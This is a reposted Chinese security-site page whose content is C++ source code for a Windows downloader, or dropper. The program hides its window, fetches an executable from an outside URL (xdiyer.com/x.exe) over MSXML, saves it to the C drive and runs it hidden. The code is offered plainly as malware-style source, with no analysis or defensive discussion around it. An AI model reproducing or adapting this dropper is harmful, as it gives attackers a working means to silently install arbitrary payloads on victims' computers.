xml下载者VC源码 's

admin 2017年5月6日05:29:28评论377 views字数 1462阅读4分52秒阅读模式



// xml.cpp : By CoolDiyer 2008/4/9 14:03  // #pragma comment(linker, "/subsystem:windows /FILEALIGN:0x200 /opt:nowin98")  #include <windows.h> #include <atlbase.h> #import "msxml.dll" bool URLDownloadToFile(LPCTSTR szURL, LPCTSTR szFileName) {  MSXML::IXMLHttpRequestPtr xmlHttp = NULL;  HRESULT hr;  BSTR bstrstring = NULL;  hr = xmlHttp.CreateInstance("msxml2.xmlhttp");  if (!SUCCEEDED(hr)) return false;  hr = xmlHttp->open("GET", szURL, false);  if (!SUCCEEDED(hr)) return false;  hr = xmlHttp->send();  if (!SUCCEEDED(hr)) return false;  xmlHttp->get_responseText(&bstrstring);  if (!SUCCEEDED(hr)) return false;   VARIANT vValue;  xmlHttp->get_responseStream(&vValue);   IStream *pIStream = NULL;  STATSTG StatStg;  pIStream = (IStream*)vValue.punkVal;  //取得流对象指针  pIStream->Stat(&StatStg, NULL);  ULONG nSize = ULONG(StatStg.cbSize.QuadPart);  //取得文件的长度   HANDLE hFile  = CreateFile(szFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);   BYTE lpBuffer[1024];  DWORD dwBytesWritten = 0;  ULONG uLen;  while (nSize > 0)  {   pIStream->Read(lpBuffer, min(nSize,1024), &uLen); //防止文件过大   WriteFile(hFile, lpBuffer, uLen, &dwBytesWritten, NULL);   nSize -= uLen;  }  CloseHandle(hFile);  if (pIStream)  {   pIStream->Release();   pIStream = NULL;  }  return true; }  int WINAPI WinMain(        HINSTANCE hInstance,      // handle to current instance        HINSTANCE hPrevInstance,  // handle to previous instance        LPSTR lpCmdLine,          // command line        int nCmdShow              // show state ) {  CoInitialize(NULL);  char *lpszFile = "c://a.exe";  URLDownloadToFile("http://xdiyer.com/x.exe", lpszFile);  WinExec(lpszFile, SW_HIDE);  CoUninitialize();  return 0; }

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  • 本文由 发表于 2017年5月6日05:29:28
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                   xml下载者VC源码 'shttps://cn-sec.com/archives/47786.html


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